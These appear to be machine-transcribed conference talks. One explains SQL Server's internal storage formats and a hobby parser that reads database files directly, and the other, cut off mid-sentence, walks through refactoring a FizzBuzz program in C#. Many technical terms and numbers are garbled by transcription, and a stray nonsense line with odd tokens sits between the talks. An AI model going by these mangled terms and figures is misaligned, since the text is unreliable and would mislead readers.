c, d. Look at page 148. And what we'll see at the end is that SQL Server tells us through dbcc page that this is stored in a blob inline data structure. And that's not actually structured. That's just data stored inline. It just kind of tells it that it's a structure. If we instead insert 5,000 characters and look at the page, what we'll see is a blob inline root, because we've already got 5,000 characters of data through the char column. So it has to row over fluid. And this is the exact same thing as we saw just before. It simply inserts a blob inline root pointer that points to a different page. And if we insert 16 kilobytes of data and look at the page, what we'll see is, again, a blob inline root. Now we just have two pointers. So that blob inline root can actually have multiple pointers that just tells us first you need to get the first part of data here, and then you need to get the next part here. And we just follow all of these pointers. If we instead try and insert 48 kilobytes and look at the page, what we will see is, once again, a blob inline root. But now there's only one pointer, even though we inserted more data. That doesn't really make sense. So let's try and look at page 148 that it points to. If we look at that guy, what we will find is another structure, in this case, known as an internal. And that one has a number of pointers. So now we have a blob inline root pointer that points to another structure known as an internal that then points to this is where you're going to find your data. So we need to follow this whole structure. So blob inline data, once it fits on page, that is the structure we're going to use, just the data in row, completely normal. When it doesn't fit in row, we're going to overflow it and insert a blob inline root pointer. And once it overflows, we're going to use some different records to actually store the data. I showed you the blob fragment record before. And what I'm going to show you now is a series of different blob structures where it actually stores this data. And all of these are stored in completely normal records. I've got a couple of status bytes and the fixed length pointer. So when you look at these next structures, just remember that we've got four extra bytes, which is the overhead in the record. But we're not going to look at those now. So one of the structures we're going to see is a type 3 data structure. And this is where your data is actually stored. So once it overflows, it'll put that on the data record, and you can find your data. And the data record has got an 8 byte blob ID, also known as the timestamp, and a 2 byte type pointer that tells it this is the kind of structure you're looking at, which for data's case is 3. And if you look at data, we've got 8,096 bytes on the body. In total, we need 2 bytes for the slot pointers. So we've got 8,094 bytes. And we've got 10 bytes of the overhead here, and we've got 4 bytes of overhead in the record itself. So we're down to 8,080 bytes left on the page. But the most SQL server we'll actually store is 8,040. And the reason for that is the SQL server may need to add this 14 byte versioning structure, and it may need to add other stuff while rebuilding indexes and doing other maintenance operations. So just to ensure that it has space, it won't fill out the page completely. So the internal has a couple of fields as well. It is type 2, same search as we saw before. It stores how many pointers do I have right now? This one has 19. It stores a maxLynx field, which is weird, because it says 501, but it won't store more than 500. So I have no idea what it's used for. Doesn't really make sense. If we look at it, it's got a blob ID timestamp, just the stealer types. It's got a 2 byte type indicator that tells us this is an internal. It's got the maxLynx, currentLynx, and level. So if you have multiple of these pointing to each other, a tree is going to be built. And it's going to say this is level 1, this is level 2, and so forth. And finally, it's got an array of pointers that tells this is where you're going to find the actual data. So to sum up, if the data fits in the record, it will just store blob inline data in the record. If you've got less than 40 kilobytes, it will store blob inline root that points to different data lobstructures. More than 40 kilobytes is going to store blob inline root that points to an internal that points to a series of these data lobstructures. More than that, up to four makes of data, well, more than four makes of data, you'll have a blob inline root that points to multiple internals that points to a lot of these data lobstructures. More than 16 megabytes, you'll have a blob inline root, points to an internal, to points to another internal, that points to data. And can anyone guess what happens then? We don't need it anymore, because if we have just four pointers in that blob inline root that points to 500 internals, that in turn points to 500 other internals, we can store up to 7.5 gigabytes of data. And given that the max size is two gigs, we have plenty of this point. So we don't need any more levels than that. However, you might see some different variations of this, but as long as you know how to pass these individual pointers, you don't really care whether you're following like 17 different pointers. You will find your data eventually. Those are the max types. Does anyone want to repeat it just quickly? No? Any questions? Excellent. I see brain smelting. So let's look at the classic lobstubes. These were the new ones. So these were the smartly designed ones. Let's look at the old ones. Has anyone worked on sidebase on their team, perhaps? I think there's a remnants in here. So the classic lobstubs don't store any data in row ever. It always points it out. And you can actually enable those new types to do the same by setting a table variable called large value types out of row. If you do that, the new lobstubs will actually act completely like the old types. So don't do it unless you have a really good reason. What it does is to leave behind a complex column, pointer. So just as before. But this type, this time, it's known as a text pointer. A text pointer has an 8-byte timestamp. It's got a page ID, file ID, and slot ID. So pretty much like the Blobby line root, just only 16 bytes and a bit more get to the point. This is the page pointer. If we look at that, if we store less than or equal to 64 bytes of data, it will punch the structure known as a small root. And the interesting thing is, no matter how much data you store, as long as it's less than 65 bytes, it's going to store 84 bytes in disk. So the small root can store up to 64 bytes of data. If you only store 24 bytes, you've got 40 bytes of garbage in disk. And that took me some time to figure out as well, because I was looking at destruction. I had way too much data. Couldn't make sense of it. I thought it was important. But it's just garbage. So no matter what, 84 bytes. If it doesn't fit in those 64 bytes, it's going to insert what's known as a large root view constructor, which is kind of like a blob inline root or an internal structure that just points to other places. It's got a header. And then it's got an array of these pointers. And the large structure type, just like data in internal, is type 5. This one won't be less than 84 bytes. So once again, if you've got a header that takes up 20 bytes and you've got a single pointer that takes up 12 bytes, you're up to 32 bytes, if that is all you need, it's going to take up 84 bytes no matter what. So that's just a lot of garbage data. And this is a general pattern with those old types. There's a lot of garbage in there that just doesn't make sense. So for the classic lobstipes, less than 65 bytes of data, it will be stored on the small root. Less than 40 kilobytes of data, you'll point to a large root Uconn that then points to the data lobs. More than 40 kilobytes, we will have a 6-point impointment to a large root Uconn that then points to an internal, the exact same internal we saw just before, that then points to data lobs. And if you have more than that, you'll have a text pointer pointing to a large root Uconn, pointing to an internal, pointing to an internal, pointing to data lobs. And that is all we need, because once again, we have those, in this case, three levels. We just have this large root Uconn for whatever reason, but we have all the space we need. So an interesting thing to observe is that if we store null in either text, which is classical lobstipe, Varchia Max, the new one, or Varchia X, all of those are going to store zero bytes, because it's null. If we store 0 to 64 bytes of data, let's just say this is zero bytes of data restoring an empty string. Varchia X is going to store zero bytes on disk. Varchia Max is going to store zero bytes on disk. The text type is going to store 16 byte text pointer pointing to an 84 byte structure that doesn't contain any data. So you're wasting 100 bytes of data to store an empty string with the text pointer. Do not use these classic types if you can avoid it. If you're storing 65 to 8000 bytes of data, the Varchia X will usually store just that data. It might have a 24 byte blobby line root pointer, and it might have 14 bytes of overhead for the record it's pointing to. Same for Varchia Max. The text will store a 16 byte text pointer pointing to an 84 byte large root Uconn pointing to another page, another record with 14 bytes of overhead, and then you have the data. So obviously, there's a lot of overhead in this type. Once you store more than 8 kilobytes, we can do it in Varchia X. Varchia Max will generally store whatever is needed for the tree and the data, and the 24 byte blobby line root pointer. The text type will store pretty much the same tree, using internals, using data loops, but it'll have the 16 byte text pointer and the larger Uconn. So the more data you're storing, the smaller difference it actually is. But generally, there's no case where the classic blob type wins over the new ones, so you don't want to use them. There's also some difference on the performance stuff. I've got a one hour session on that, if anyone is bored tonight. Otherwise, there's a blog post with another clever guy that done a lot of testing on this. Generally, don't use it. So one interesting thing is I've mentioned some different structures here. I've mentioned small root, internal, data, large root Uconn, and if you look at the types of those, small root is zero, internal is two, data is three. I kind of wondered what is type one, because there's a gap in there. What is type four, and are there any more types? And if we look at these different lob structures, generally you've got some kind of header. But more interestingly, you've got a two byte value that says what kind of structure is this. So I shut down sequence of again, opened up the file in the hex editor, and it changed those two bytes. I didn't change anything else, just those two bytes. And it changed those two to one, and a four, and a six. And I came up with some different names. Obviously, I corrupted the database each time, but DBCC page was kind enough to give me the names of these structures. We've got a large root. We've got a large root, Shiloh. Shiloh was the code name for sequence of a 2000. We've got a super large root. I have no idea what it is. I've never seen it in the wild. What I'm thinking is, at some point, pre-sequels of a 2000, they probably had this large root structure. Then in sequence of a 2000, they needed to change something. So they added the large root Shiloh. In 2005, code name Uconn, they needed to change it again. So they added large root Uconn. And super large root is probably pre-sequels of a 2000, sequence of a 7, maybe in sidebase. I have no idea how old it is. And once I came up to 8, it began giving me null and ill-valid. 7, interestingly, was neither null nor invalid. But it had an empty name. I'm not sure what it is. I'm not sure if they used. You won't see these type in sequence of 2005. 8 plus. But they are probably out there. So just to sum it up, if you have less than 8,000 characters, the max types are pretty much the same as the x types. Logically, they're stored slightly differently. But on disk, it's the same. More than 8,000, you start building a whole tree. And if you're using classic text types, there's a lot of legacy craft in there. There's a lot of overhead. So don't use them. Any questions before I speed up since I'm running short on time? Good. So sequence of stored stuff either as a cluster index or a heap. Cluster index is some heaps of where data is actually stored. Primarily the only difference is cluster index is guarantees the order of your data. And it's stored in a B tree, whereas the heap just puts in your data wherever there's space. And there's no tree structure. And once it does this, it also keeps track of this logically in what's known as allocation units. So if you have an object with cyber, either heap or a cluster index or non-cluster index, you have an object. Each of those will have a number of partitions, at least one. It may have more. And each of those partitions will have what's known as an allocation unit. It will have the heap of B tree, also known as the hobbit allocation unit. And this is your in-row data. This is where your rows actually stored. If you have row overflow, it will be stored in the slab allocation unit. And if you have the classic text types, they'll be stored in the lob allocation unit type, just as Varchar Maxx is also stored in the lob allocation unit. If we have a B tree, we've got a root page somewhere. We just need to follow it all the way down to the very first leaf-level page. And since these are stored in a doubly linked list, we can just follow that linked list of pages and just read all the data. A heap is kind of different, because it's not stored in a tree, but it uses what's known as an IAM page, which is a tracking page that keeps track. These pages are mine. This is where my data is. So we can just find that first IAM page and follow the links to the pages. And eventually, a link to the next IAM page that has links to the actual pages. We can find all the data. So generally, we need to find that root page, or we need to find that first IAM page. So usually, well, not usually always, data is not just stored in pages logically. It's grouped into what's known as an extent, which is a group of eight pages, 64 kilobytes of data. And they come in two flavors. You've got the mixed extent, where different objects, or different tables, different indexes, store pages in the same logical group of eight. And the first eight pages of any object will be stored on a mixed page, just to save space. Whereas from that point on, it'll allocate eight new pages. It'll allocate a complete, uniformly dedicated extent to that object once it needs more pages. And the way it keeps track of this is through some allocation pages. We've got the global allocation map that keeps track. Overall, is this extent of eight pages allocated or not? Is it in the use not? We've got the S-GAM, share global allocation map. It keeps track. Is this used for mixed pages, a different object in here? And is the free space available? And each of these pages has those 8,192 bytes to do with. So it can track 63,904 extents. So 63,904 times eight kilobytes is just about eight four gigabytes. After that, we've got a new GAM page, a new S-GAM page, and we've got a new GAM interval. So the data file is split up in these four gigabytes, intervals, that we need to track. We've also got the IAM page, which keeps track of which extents are uniformly allocated to a single allocation unit. So if we have a heap and it has an extent with data in, that IAM page will keep track that these eight pages, this extent, is owned by this object uniformly. And the head of this IAM page, I'm not going to go into that. More importantly, there's an array of single page pointers. Since the first eight pointers for a given object are dedicated to mixed extents, so they're shared with different objects, we need single page pointers. After that, we just need pointers to the extents where the data is stored. And if we put this up in a table, the GAM bit overall just keeps track of this extent in use or not. If it's one, it means that it's not in use. So basically, one says it's available. The S-GAM will have a one if it's mixed and that there's free space. If there's not free space but it's mixed, it will be zero. And finally, the IAM bit says, is this uniformly dedicated to this allocation unit? And if we just combine all of these, we get the different states that the extents could be in. And we get a series of invalid states that doesn't make sense. It can't be uniformly allocated while it's not in use. So using this table, we can find out a specific extent, what's stored in it and what is its state. There's also another allocation page type called a PFS page, page free space, which doesn't store a bitmap tracking extents but stores a bytemap tracking pages. So every page within its range of 8,084,88 pages will use a single byte that keeps track of how much free space is there. Are there any ghost records that needs to be deleted physically from disk? Is it an IAM page, mixed page, allocated page, and so forth? PFS pages aren't that interesting in this case. It's the other allocation unit pages that we really need to find the data. So quickly, an MDF file. The very first page is the file header. This is what all MDF parses. That's the very first thing to find out, is this your primary data file, is it a secondary data file, and where does it fit into the sequence of data files? We've got the first PFS page, GAM page, S-GAM page. We've got some legacy pages that are unused. We've got a diffmap page that tracks what extents have been modified since the last difference of backup. So as you all know, these are the ones we need to backup. We've got an ML page that keeps track which extents have been modified by a minimally locked operation since last backup, once again used for backup purposes. And then at some point, it just repeats itself with new PFS page, new GAM page, new S-GAM page. More interestingly, page 9, index 9, is the boot page. And I'll show you this in just a moment. Now comes the fun stuff, or funnier stuff. So now we know how to parse it, but we need to find it. So we need the schema to parse it. We need to know what we expect to find. And more importantly, we need to point it to that very first page so we know where to begin scanning. So let's see how we could do it. I'll create an empty database, and I'll create a table. Doesn't really matter about the structure, we just need a table. I'll insert a single record. And if we now look up in the sys.tables and column views for this table, what we'll get is the whole structure of it. So we've got the name of the columns, the IDs, the type, which we can look up and find that these are integers, and barters, whatever they are. So using this, we've got the schema. If we run dbccind, we get the page ID, which is what we need. So we need a way to replicate what dbccind does. If we look up our table in the sys.tables view, we get an object ID. And if we take that object ID and look up in sys.tapetitions, we get a partition ID. If we then take that partition ID and look up in system internals allocation units, we get an allocation unit ID. More importantly, we get appointed to that very first page. Using this, we've now got appointed to the page. We know how to parse it. We're done. Almost. So sys.tables define our object ID, sys.tapetitions define our partition ID, and sys.systeminternals allocation units define the allocation unit ID, and that pointed to the very first page. Problem is that these are dynamic management views, and they're not stored on disk. So we need to look up in these to find the pages that we need to read, but we can't read these DMVs unless SQL server's running, and that kind of defeats the purpose. So there's a problem here. But there's always a but. We've got an empty database. And if we use sphelptext on the sys.tables view, it's actually going to give us the source code of it. If we look at this, what we see is that sys.tables at some point does a select from sys.optics dollar. So sys.optics dollar looks interesting. We can do the same for sys.columns, and we will see it looks up in sys.colpars. So we've got some more, kind of more internal tables here. So let's try and do a select star from sys.optics dollar. Doesn't exist. So SQL server will hide all of this for you, because you're not supposed to look in it. But there's a special way you can connect to SQL server. If you just connect again, and you say admin colon, and you've enabled what's known as the dedicated administrator connection, you can get some special privileges. One of them is that it allows you to query the base tables. So now we're querying sys.optics dollar, and we're getting all of these table names. And a lot of these are the internal base tables that are not returned in sys.optics normally. We can also look up sys.colpars and so forth. So let's try and look up sys.optics dollar in sys.optics dollar, since we need the object ID to move on. Problem is, there's no results. sys.optics dollar doesn't exist. If you look at the source code of sys.optics dollar, you'll find that it's actually a hidden view. It's not really an object. So what it's known as is sys.schema.objects. And we can look up sys.schema.objects in sys.optics dollar. And during that, we can now look up sys.schema.objects in sys.schema.objects. And we get the very base table where this metadata is stored. So this is the lowest level you can get that points to this object that it exists. So we've got an object ID of 34. Using sp.help, we can also get the schema of this table, which is fixed, at least for a given sequence or version. So it's just a matter of running this once, hard coding it, and we've got schema for sys.schema.objects. So we found the base tables. They've got a lot of weird data. I'm going to go really fast now. We can only group them through the Deaducated Administrator connection, and they've got a lot of weird columns that doesn't really match anything. So sys.schema.objects is where we start. We have got an empty database. And we can look up sys.schema.optics in sys.schema.optics. We get an object ID of 34. Using that, we can look up in sys.colpars to get the columns of sys.schema.optics. Using that object ID, we can also look up in sys.rosets, which is the base table of sys.partitions. We get the partition ID. And finally, we can look up in sys.alloc units using that partition ID, and we have found that very first page. So everything is good. Now we have the base tables, but the problem is we still need that very first pointer to that first base table. So how do we find that one? If we do dbcc page on page ID 9, which is the boot page, what we will find is that at some point there, there's an entry known as dbi versus indexes that points to page ID hex 10, which is page ID 16. So if we look up at that page, we're actually going to find the sys.alloc units base table. Since we've got a fixed location for the boot page, we can now consistently find sys.alloc units, and we can parse sys.alloc units. Question is, can we use that? This is the data we've got now. And if we hard code a special allocation unit ID, 327, 680, we will find a special allocation unit that is owned by the sys.roset object. So using that hard coded allocation unit ID, we can now find the partition data. And using another hard coded object ID of 34, we can find the allocation unit for the sys.schema.optics table. So using just those two hard coded values, we can now find sys.schema.optics and move on from there. Once we've got sys.schema.optics, we can look up sys.callpaths in that one. And we can look up the partitions, and we can look up the allocation units. And finally, we've got the data for sys.callpaths, which is the schema. Now we've got the schema, we've got the object, we've got the partitions, and we've got the allocation units. We've got everything. The one thing that remains is that when you look at the source code of this, there's a lot of weird internal functions. In this case, we're doing, this is Microsoft code. They're doing a select from sys.rscult, which is the base table, also a just a c. And then they're doing an auto-apply on something known as open-rowset, table-rc-prob. And they pass the ti field of this table into it. And if you look up here, all of these values stem from that very ti value. I googled this. And if you Google it today, all you'll find is me winding in the blog post that there are no Google results about it. So I couldn't really find anything existing. What I did was I created a table just creating a lot of different data types in different configurations. Then I did a select on the system internal partition columns view. And joining that with the base table, sys.rscult, joining it with the view sys.types that tells us all of the different data types. And I got a result like this that tells for the binary type, we've got a ti value of 12973. And these are all of the values that we need to extract out of that value. If we look at binary, we convert that to hex. We've got two zero bytes, and then we've got 32 AD. If we look at the ti value 173, we convert that to hex. We get the hex code AD. And AD seems to match the very last byte. So doing a simple bit masking, we can get that value out of the ti column value. So we can get the system ti value. We also need the max link field with a decimal value of 50, hex value 32, which is stored right here. So doing a simple byte masking and shifting it out, we can extract that value from the ti field as well. All is good. Except each of these different data types stores its data differently in the ti field. So you have to go through each of these data types and figure out how do they store the values. And I have no idea why they didn't just store this in different columns. That would make my life so much easier. I have no idea why they do it. But I went through this for all of the different types. And what I ended up with was a parser. So this is called ti parser. It takes in a value. And it just gives you out all of these different values for the different data types. And I've got a bunch load of unit tests for it. And it kind of works. And it actually does work. And with about five minutes to go, I think that was my mark. Did anyone not get anything of what I said? Simple stuff, right? Anyone have any questions? Once again? To fully reverse engineer all the formats that you want. In SQL Server. Yeah. How long do you think that would take based on your knowledge of what you've been able to do? I started out doing this for conference in March last year. I just parsed a single page. I was doing an internal session. I wanted something special. And I don't know what happened. But a year later, I had this project. And right now, it parses about 98% of database format. I even parsed compression. I parsed sparse vectors, sparse columns. I've got a lot of special types parsed. There's not really a lot more to do. I need some minor stuff here and there. And if just added column-based indexes, they add some new different stuff that might parse in C++ 2012. But really, there's not that much that I'm missing from it. I have some special stuff like XML fields. I can parse the data out. But I can actually convert it into DXML data. So there's some data types that I don't support yet. But I can get you the bytes that stored on disk. So well, a year is a long time. But it doesn't actually take that long time. Once you just get the page format down, you get the header, and you just link it up, just magically, all of a sudden, you can scan a table. Once you get to that point, it's a very nice feeling. So I spent about a year on it as a hobby next to my job. Thank you. Can you give me a scenario where they would like to use this application? Where Microsoft would let me use it? Or where I would like to use it? So I had recently a database server that wouldn't start. I applied a Windows update. I tried to start it. It didn't work. I got some weird error in the vent log. My first walk was that the master database might have been corrupted. So I opened the master database in OrchMDF and verified that it worked. And from that point on, I just exclude that wasn't the issue. I found the other issue late on, it was a permissions issue. This is a very simple case where I actually used it. Another thing is, did anyone notice that I didn't type in a username or password for the AdventureWorks database? Unless you're using encryption, your data is open, completely open. You can read any data from any database using this tool without logging in. If it's encrypted, I can't do it yet. But you might also do it if you have a database and you don't have logins for it. You might do it if you want to learn a lot of stuff about the internals just by looking at the source code. Technically, you could deploy this on your smartphone and read a sequence of a database for 256 kilobyte DLL. I don't know why you'd want to do it, but you could. I don't really have any practical uses examples. This is like playing football. It's just fun. What happened to self-containing databases? I don't. Yes, the self-contained database is the primary differences that users have stored in the actual database. And I haven't looked at it yet, but I probably just stored in some kind of metadata table in a page. So I don't really care about the uses, because I just read the data. But if I wanted to parse the uses, I would have to find a metadata table. And I noted the passwords encrypted, so I can't get that out. But I don't think there's a lot of difference in the actual format. The format is the same, same pages, same structure, and everything. So that's just more metadata tables. I have one more question. Will the structure or database structure change when we go from moving disks to SSDs, and we put everything into a kind of memory? Yes and no. So will data structures change when we go to SSDs? If you were to create a SQL server of bottoms up today and you optimized it for SSDs, sure, you'd definitely make some different changes. SQL server is heavily invested in the format they've got right now. They most likely won't change. I can't see them changing anything major anytime soon. The major difference is that a lot of stuff that you use to do, like defragmenting your tables, you don't really need to do that anymore. It's still the same format, but you don't care about fragmentation. You care about using your pages so you don't have a lot of free space on them, but you don't care about the sequence that they're stored in. Because SSDs is free to do random reads. So there's some stuff that doesn't matter anymore that might not want to optimize for anymore. But I don't see the format changing right now, but for new databases, sure. Unless there's anything else, I will be up here. And thank you for attending.<|am|><|translate|> my own political agenda. I will take this opportunity. Trust myục You
|
Think SQL Server is magical? You're right! However, there's some sense to the magic, and that's what I'll show you in this extremely deep dive session.
|
10.5446/50985 (DOI)
|
We good? Good afternoon everybody. My name is Philip LoRiano. Today I will be talking about a different way of refactoring. So the first thing I'm going to ask everybody here is how many people have actually read the refactoring book? Or I've seen, I've heard of it. Okay, so quite a few of you. Now one of the things that I learned during my times of just writing all these different libraries is that when you're refactoring, at least when you're going through that book, one of the biggest problems is that typically what they will do, what Martin Valer does is say, here's a list of smells. If you see this one particular smell, then you refactor it with this particular refactoring. And while that's okay, if you want to look at a reference book, there really isn't any particular example that shows you how to do an end-to-end refactoring so that you can start with a complete mess all the way to something that is relatively clean. At the same time, what usually happens is that if you have a book like the refactoring book, although it is a great book, there's a lot of information. There's not enough, there has to be some way to distill all this information into something that you could take away and walk away from this talk and use it immediately right after you leave this room. So here's a couple examples of the bad code smells that they usually tell you to do with refactoring, at least classical refactoring. And there's a lot of smells that you actually have to look for, but in this case, what I'm going to do for the people in the audience as well as the people who are watching this on the video is I actually have a GitHub account with the code for this talk. It's available right now if you want to check it out in the audience, as well as if you want to check out my code that I've actually written as far as my libraries, because it's one thing for me to come up here and say, I'm going to teach you how to refactor, but if you look at my code and it's not clean, then certainly there would be a lot of questions raised. So I challenge you to look at what I've written so far and tell me if you see anything wrong. Of course, there's always room for improvement, but to give you an idea, this is the kind of code that I write. So today, what I'm going to be talking about is a different form of refactoring. It's nothing different than what you've read in the refactoring book, but it's a little bit more focused. As you can see here, we have the different levels of refactoring. So for example, you have the single line statements, the block statements, the methods, and the classes. Now, the problem is with traditional refactoring, it just goes, there's nothing that links the chain so that you could go from single line level to block level to methods to classes. So today, I'm going to teach you something that's going to be a little bit different than what you might be used to. Some of you might even say it doesn't make any sense because it's too robotic. So what I'm going to introduce to you today is something called blind refactoring. I call it blind refactoring because I discovered this back in 2005 when I was just, I just kept refactoring my code base and I didn't even realize that the quality of the code was getting better and better and better. And the reason why I call it blind is because there was a certain set of steps that I kept following and for some reason, the designs that I came up with afterwards were anything better or actually they were way better than anything I could have thought if I were to design it up front. I'll give you an example. So for, let's take a look at, so let me back up a second. So with blind refactoring or with any typical refactoring operation, there's usually two things that you work with. In this case, you typically work with decomposition. That means you extract methods out and you extract classes to the point where everything has one and only one responsibility. And for at least those of you in the Java.net space, we do have IOC containers which allow us to balance out this decomposition so that even if you have all these little pieces scattered in a million places, we can still put it back together as if it was just the same app without any of the duplication. So, let's see. So today I'm going to, everybody here is familiar with FizzBuzz, right? The basic principle is what you see here on the screen. I don't need to repeat it, but we're actually going to refactor this, which sounds a little bit silly. But the reason why we're going to refactor FizzBuzz, despite its simplicity, is that the same principles that apply to refactoring FizzBuzz are the same principles that you would apply to taking any component in your application and just recursively refactoring it until it's absolutely clean. So it doesn't matter whether it's an enterprise app, it doesn't matter whether it's just something you're coding at home. The principle is still the same. The reason why it's still the same is that it's just a repeatable set of steps that you follow. It's not like your typical Fowler approach where you say, I need to look up into this book of, you know, this list of code smells and figure out what I need to do next. This is quite automatic. So with decomposing FizzBuzz, there's a few things that we're going to be doing. Actually, the interesting thing about this particular approach is that there's only four types of refactoring that you actually need to deal with. The first type of refactoring that you have to deal with when cleaning up your code is the simplest one. It's method extractions. The second type of refactoring that you have to deal with is class extractions. The third one is you have to be able to extract the interface out of your concrete classes so that when you want to be able to rely on those interface dependencies rather than the concrete dependencies, you could just go ahead and use the interfaces instead. And the fourth one, depending on how you want to do it, you could actually, the fourth one is probably the most important one because once you start extracting the interfaces, that's when you start replacing things like inheritance with delegation so that when you start calling those methods, so when you start making those calls, you're no longer relying on inheritance. You're no longer relying on these large blocks of code. The other half of this is basically what I mentioned before. So you have to extract all the interfaces. You have to replace all the concrete references. And optionally for us.NET guys, we do have some very, very good IOC containers out there that will actually put it all together as if it was not a problem in the first place. So as I mentioned before, these, by the way, this is going to be the shortest set of slides you'll ever see in any presentation. This is the last slide, actually. But the interesting thing about this is if you go to this URL right now, it actually has a complete history of one end-to-end refactoring. And I'll pull it up right now. So what we have here is a standard FizzBuzz program. It's not very interesting. It doesn't do much. But the point here is that if you have a program like this, we could pretend that this is not FizzBuzz. We could pretend that this is some nasty 10,000-line program that somebody decided to put in a functional one large main function, which does happen every now and then. So thanks to the magic of GitHub, or actually magic of Git, we could step forward and backward in time to see what this would actually look like from the very end all the way back to the very beginning. So I'm not going to bore you with the steps in between because it would be one thing for me to say that, you know, I know how to refactor without showing you what it actually looks like in the end. So let's step forward a bit and then we'll step backwards. So, okay. All right. So what I've done here is this is what it looks like after FizzBuzz has been completely refactored and completely broken down to the real point where you cannot refactor it anymore, at least in practical terms. One thing you might want to notice in this particular example is that FizzBuzz, despite its, I mean, it hasn't really changed all that much. There's only like four classes. By the way, has anybody here seen Enterprise FizzBuzz? Okay. If you want an example of how not to design something, take a look at Enterprise FizzBuzz. It was meant to be a joke, but if you want to get an example or at least a contrast, check out Enterprise FizzBuzz and compare it to what you see here. But as far as this example is concerned, what we have is one class and the code is very, very, very simple. In fact, it's, I haven't added anything to this particular class at all. I've only moved a couple of features around and the only thing that I did add was I did add an IOC container because if you're working with a full scale app, you need to be able to manage the dependencies without getting anything tangled up. In this case, I'm using Hero, but if you want to use Castle, Structure Map, AutoFact, it's really up to you. None of these features are container specific. This is pretty much container neutral. All right. Now that you've seen what the end looks like and it's quite simple, let's go all the way back to the beginning. The idea here is, let me see if, okay, here we go. So I'm going to step back to the very beginning and we're going to go back to single program. I haven't touched anything. Now, I mentioned earlier that we have the different levels of refactoring. So we've got the single level, single statement level, the method level, the class level, and so on and so forth. So at the very most basic level, what we want to do is eliminate the duplicate statements. We want to make sure that even in something this simple, there's absolutely no duplication. So what I've done, at least for this particular refactoring, is if you take a look at this, you'll see that there's multiple console write line calls being in place. And when you have a situation like this where you have an if, else if, and so on chain, the simplest thing that you could possibly do when you have the same statement being called is that you actually extract out what it's writing. So if I go over here. And, um, Damn, you get. Okay. So give me a second here because this is Hottie's keyboard. Okay. Okay. Okay. Here we go. Sorry. Copy. So, all right. In the words of Bill O'Reilly, we're going to do it live. So what I'm going to do is I'm going to do, I'm going to live code it. This is going to be interesting. Okay. Or I could just come on. Okay. While Visual Studio is waiting to catch up to me, let's go over this and we can skip a few steps. Okay. So although we've skipped quite a few steps here, see if I can backtrack and do. Okay. So this is a little bit more difficult to pick up though, but you could, I think here's what happened. So I did two things. I did a method extraction and at the same time I changed the console.writeline calls into a single writeline call and I placed it here. I also did, well, when I did the method extraction here, all the logic to determine whether or not fizzbuzz is fizzbuzz or the number is fizzbuzz was placed into this particular method. Not too interesting, right? But the point here, at least at this point, what we're trying to do is we're trying to recursively do method extractions to the point that every single method that you see is a single task method. And when I say a single task method, that means the method does one and only one thing. For example, if you have a method that looks up a config string and tries to connect to a database, it's doing two things, not one. In this case, we're still dealing with statics. We're still dealing with multiple if, else if, and so and so chains. Now, one thing about if and else if blocks. They might look clean, at least when you have only three cases like this, but what happens is it gets messier and messier because it's equivalent to basically your switch statement. Now, Resharper has this nice little tool that lets you invert it, but I'll invert it in this case just so you get an idea of what it actually looks like. And I'm going to completely invert the whole if statement to give you an idea of what kind of mess it actually does provide you. So, it went, just by inverting these if statements, this pretty much reveals what you're actually dealing with. And this wouldn't be bad given that this is only, what, 20 or 30 lines. But imagine if this was your 2000 line program or you have a 2000 line class, those happen pretty often depending on which client you end up with. So, there has to be a way in this particular case to clean this up. There has to be a way to take all that arrow code and flatten it. And it turns out there is. The way you could actually flatten it is if you invert the if statements. And you could keep inverting it and introducing guard clauses so that this effectively becomes a single level if statement. So, I'll do this slowly. And luckily, Resharper could do most of the work, so it's not really that difficult. So, I have the if statement here. And I also have an else here. So, the first thing that I'm going to do is you can actually, all right. Now, let's invert this the first time around. Now, what I could do here is instead of doing what to print, I'll just go ahead and do a return. And if you notice, Resharper actually graze this part out and tells you that you no longer need it. And this is pretty useful because in most cases, it's I'm actually using Resharper to do my design for me. I could just take the else and remove it. And all of a sudden, this is flat. If I do this again, and let's say I go here and I do a return, and I invert again, the same thing happens again. And with just a little touch up, it's more semantic than anything, I could cut this down to just a little bit. And this is what it looks like. The other thing about if statements that will get you every single time is what if you run into a case where the if statement is, I don't know, maybe 3,000 lines long. What do you do with that? So, I'm going to step all the way back to what it originally was. We're not, I'll step forward to the unrolled part. Let's say this piece of code is, this piece of code is 3,000 lines long. And this piece of code is another 3,000 lines long. So, what do I do? We have a problem because this is easy because I could see the whole code. And there has to be a way to understand this and make it into something that you could still refactor. So, my solution is not so popular. For those of you in C sharp, who among you here hates regions? With a passion. Okay. Well today I'm going to actually teach you a useful purpose for regions that is not going to make you hate it with a passion. The reason why you should use regions in this case is that I could collapse this entire section into something that actually explains what it does, refactor everything around it and then take the region out once I need to work on what's inside the region. So, the idea here is if you run into cases where you've got two 3,000 line blocks or something that is completely unmanageable if you were just to just leave it as is, you need to be able to at least conceptually abstract away what it does without actually changing the code. Regions are the quickest, dirtiest way to do it without introducing any form of bugs at all because as we all know in C sharp regions do absolutely nothing but maybe annoy you a couple of times when you have some generated code. That being said, once you actually take and refactor everything around the regions, then that's when you can start chopping everything down into smaller bits. Okay. So, let's if statements and let's see what I did. Here we go. So, this is what I was talking about earlier where we cleaned this up and then... So, the other thing that I did was this, there's a slight little change here where I took out this line of code and extracted it into another method. It might seem silly because it's just one line of code, it's not going to be used anywhere else, but there's a purpose to this and you're going to see it in a second. The idea here is that once you get it to a point where you have multiple methods that do single tasks, you need to be able to group these methods together with regions that say what they actually do. In this case, this is just... I believe actually... For displaying the numbers. Okay. Yeah. So, what happened in this case is I did an additional extraction and the run method would basically represent the starting point of the program, but the principle is still the same. So, if I just go over and do this and I collapsed it, this gives you an idea of what the main program would look like if everything was already refactored. Now you might be looking at the region and saying, what are we going to do with that? And what we're going to do with this is that we're actually going to extract it into another class. Okay. I'll move forward a little bit and see if... Here we go. So, the first thing that I did is that if you look at this... So, everybody sees this particular thing right here, right? Let's see. Damn Spanish. Okay. So, you see these little red marks on the side right next to the scroll bar. It looks like somebody slit the wrist. It's basically resharper just telling you that there's something wrong with this picture. And if I were to compile this, it would give me a compile error, which is perfectly fine because we're actually doing an incremental class extraction. The other thing you'll notice is that if you look at the runner class, which I've extracted everything into, the run method is still private static as if it were an original part of the actual main method. And the idea there is that I'm actually just taking everything, cutting it away, and then putting it into a separate class. Normally, I would have just cut it away and then fixed it so that it was delegating to a static method. But in this case, I just wanted to show you the incremental steps to give you an idea of what's going on here. So, all I did in this particular step is I just fixed it so that the actual build error will be fixed. Of course, if you wanted to make this a little bit more object-oriented, none of this that you see here is object-oriented. In fact, it's very, very procedural since we're all dealing with statics. The idea at this point is we want to do class extractions to a point where it's no longer static, it's actually an 